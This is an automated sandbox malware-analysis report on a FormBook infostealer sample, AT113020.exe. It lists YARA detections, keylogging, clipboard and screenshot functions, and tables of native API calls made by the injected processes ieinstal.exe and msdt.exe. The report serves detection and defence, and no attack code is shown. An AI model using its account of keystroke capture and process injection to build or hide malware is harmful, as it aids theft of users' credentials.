Source: msdt.exe, 00000008.00000002.1016843957.0000000000763000.00000004.00000020.sdmp	String found in binary or memory: https://www.google.com/chrome/i?
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0SL

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\AT113020.exe

Code function: 1_2_00440590 OpenClipboard,GlobalAlloc,GlobalLock,EmptyClipboard,SetClipboardData,GlobalUnlock,

1_2_00440590

Contains functionality to read the clipboard data

Source: C:\Users\user\Desktop\AT113020.exe

Code function: 1_2_0042D090 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,

1_2_0042D090

Contains functionality to record screenshots

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe

5_2_0042D788

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\Desktop\AT113020.exe

Code function: 1_2_004506F4 GetKeyboardState,

1_2_004506F4

Yara detected Keylogger Generic

Source: Yara match	File source: Process Memory Space: AT113020.exe PID: 5920, type: MEMORY
Source: Yara match	File source: Process Memory Space: Accfdrv.exe PID: 5488, type: MEMORY
Source: Yara match	File source: Process Memory Space: Accfdrv.exe PID: 5916, type: MEMORY

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000008.00000002.1019192293.00000000041E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.291702047.0000000004D34000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.291786561.0000000004DC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1015357654.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.290339336.00000000033D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.290677967.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.242236710.0000000002A55000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.242326324.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.276173804.0000000002A64000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.292339474.0000000002610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.289704123.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.284307510.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.283670455.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.284896549.0000000002F30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1016394094.0000000000690000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.285937486.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.242189185.0000000002A2C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.276221238.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.AT113020.exe.2ad0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Accfdrv.exe.2af0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.AT113020.exe.2ad0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Accfdrv.exe.2af0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Accfdrv.exe.4dc0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Accfdrv.exe.4dc0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000008.00000002.1019192293.00000000041E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.1019192293.00000000041E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.291702047.0000000004D34000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.291702047.0000000004D34000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.291786561.0000000004DC0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.291786561.0000000004DC0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.1015357654.0000000000140000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.1015357654.0000000000140000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.290339336.00000000033D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.290339336.00000000033D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.290677967.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.290677967.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.242236710.0000000002A55000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.242236710.0000000002A55000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.242326324.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.242326324.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.276173804.0000000002A64000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.276173804.0000000002A64000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.292339474.0000000002610000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.292339474.0000000002610000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.289704123.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.289704123.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.284307510.0000000002F00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.284307510.0000000002F00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.283670455.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.283670455.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.284896549.0000000002F30000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.284896549.0000000002F30000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.1016394094.0000000000690000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.1016394094.0000000000690000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.285937486.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.285937486.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.242189185.0000000002A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.242189185.0000000002A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.276221238.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.276221238.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.AT113020.exe.2ad0000.5.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.AT113020.exe.2ad0000.5.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.Accfdrv.exe.2af0000.5.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.Accfdrv.exe.2af0000.5.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.AT113020.exe.2ad0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.AT113020.exe.2ad0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.Accfdrv.exe.2af0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.Accfdrv.exe.2af0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.Accfdrv.exe.4dc0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.2.Accfdrv.exe.4dc0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.Accfdrv.exe.4dc0000.7.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.2.Accfdrv.exe.4dc0000.7.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Contains functionality to call native functions

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_00417BA0 NtCreateFile,	2_2_00417BA0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_00417C50 NtReadFile,	2_2_00417C50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_00417CD0 NtClose,	2_2_00417CD0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_00417D80 NtAllocateVirtualMemory,	2_2_00417D80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_00417BF2 NtReadFile,	2_2_00417BF2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_00417B9A NtCreateFile,	2_2_00417B9A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_00417CCA NtClose,	2_2_00417CCA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_00417D7A NtAllocateVirtualMemory,	2_2_00417D7A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479A50 NtCreateFile,LdrInitializeThunk,	2_2_03479A50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479A00 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_03479A00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479A20 NtResumeThread,LdrInitializeThunk,	2_2_03479A20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479910 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_03479910
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034799A0 NtCreateSection,LdrInitializeThunk,	2_2_034799A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479840 NtDelayExecution,LdrInitializeThunk,	2_2_03479840
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479860 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03479860
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034798F0 NtReadVirtualMemory,LdrInitializeThunk,	2_2_034798F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479710 NtQueryInformationToken,LdrInitializeThunk,	2_2_03479710
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479FE0 NtCreateMutant,LdrInitializeThunk,	2_2_03479FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479780 NtMapViewOfSection,LdrInitializeThunk,	2_2_03479780
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034797A0 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_034797A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479660 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_03479660
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034796E0 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_034796E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479540 NtReadFile,LdrInitializeThunk,	2_2_03479540
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034795D0 NtClose,LdrInitializeThunk,	2_2_034795D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479B00 NtSetValueKey,	2_2_03479B00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0347A3B0 NtGetContextThread,	2_2_0347A3B0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479A10 NtQuerySection,	2_2_03479A10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479A80 NtOpenDirectoryObject,	2_2_03479A80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479950 NtQueueApcThread,	2_2_03479950
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034799D0 NtCreateProcessEx,	2_2_034799D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0347B040 NtSuspendThread,	2_2_0347B040
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479820 NtEnumerateKey,	2_2_03479820
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034798A0 NtWriteVirtualMemory,	2_2_034798A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479760 NtOpenProcess,	2_2_03479760
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479770 NtSetInformationFile,	2_2_03479770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0347A770 NtOpenThread,	2_2_0347A770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0347A710 NtOpenProcessToken,	2_2_0347A710
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479730 NtQueryVirtualMemory,	2_2_03479730
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479650 NtQueryValueKey,	2_2_03479650
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479670 NtQueryInformationProcess,	2_2_03479670
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479610 NtEnumerateValueKey,	2_2_03479610
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034796D0 NtCreateKey,	2_2_034796D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479560 NtWriteFile,	2_2_03479560
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479520 NtWaitForSingleObject,	2_2_03479520
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0347AD30 NtSetContextThread,	2_2_0347AD30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034795F0 NtQueryInformationFile,	2_2_034795F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_00417BA0 NtCreateFile,	6_2_00417BA0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_00417C50 NtReadFile,	6_2_00417C50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_00417CD0 NtClose,	6_2_00417CD0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_00417D80 NtAllocateVirtualMemory,	6_2_00417D80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_00417BF2 NtReadFile,	6_2_00417BF2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_00417B9A NtCreateFile,	6_2_00417B9A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_00417CCA NtClose,	6_2_00417CCA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_00417D7A NtAllocateVirtualMemory,	6_2_00417D7A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9A00 NtProtectVirtualMemory,LdrInitializeThunk,	6_2_030B9A00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9A20 NtResumeThread,LdrInitializeThunk,	6_2_030B9A20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9A50 NtCreateFile,LdrInitializeThunk,	6_2_030B9A50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	6_2_030B9910
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B99A0 NtCreateSection,LdrInitializeThunk,	6_2_030B99A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9840 NtDelayExecution,LdrInitializeThunk,	6_2_030B9840
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9860 NtQuerySystemInformation,LdrInitializeThunk,	6_2_030B9860
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B98F0 NtReadVirtualMemory,LdrInitializeThunk,	6_2_030B98F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9710 NtQueryInformationToken,LdrInitializeThunk,	6_2_030B9710
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9780 NtMapViewOfSection,LdrInitializeThunk,	6_2_030B9780
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B97A0 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_030B97A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9FE0 NtCreateMutant,LdrInitializeThunk,	6_2_030B9FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9660 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_030B9660
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B96E0 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_030B96E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9540 NtReadFile,LdrInitializeThunk,	6_2_030B9540
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B95D0 NtClose,LdrInitializeThunk,	6_2_030B95D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9B00 NtSetValueKey,	6_2_030B9B00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030BA3B0 NtGetContextThread,	6_2_030BA3B0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9A10 NtQuerySection,	6_2_030B9A10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9A80 NtOpenDirectoryObject,	6_2_030B9A80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9950 NtQueueApcThread,	6_2_030B9950
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B99D0 NtCreateProcessEx,	6_2_030B99D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9820 NtEnumerateKey,	6_2_030B9820
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030BB040 NtSuspendThread,	6_2_030BB040
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B98A0 NtWriteVirtualMemory,	6_2_030B98A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030BA710 NtOpenProcessToken,	6_2_030BA710
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9730 NtQueryVirtualMemory,	6_2_030B9730
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9760 NtOpenProcess,	6_2_030B9760
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9770 NtSetInformationFile,	6_2_030B9770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030BA770 NtOpenThread,	6_2_030BA770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9610 NtEnumerateValueKey,	6_2_030B9610
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9650 NtQueryValueKey,	6_2_030B9650
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9670 NtQueryInformationProcess,	6_2_030B9670
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B96D0 NtCreateKey,	6_2_030B96D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9520 NtWaitForSingleObject,	6_2_030B9520
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030BAD30 NtSetContextThread,	6_2_030BAD30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9560 NtWriteFile,	6_2_030B9560
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B95F0 NtQueryInformationFile,	6_2_030B95F0

Detected potential crypto function

Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_00464BC8	1_2_00464BC8
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_004021B0	1_2_004021B0
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_004484D0	1_2_004484D0
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_00405758	1_2_00405758
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0041B012	2_2_0041B012
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0041B8CF	2_2_0041B8CF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_00408A40	2_2_00408A40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0041B411	2_2_0041B411
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0041B5DA	2_2_0041B5DA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_00402D90	2_2_00402D90
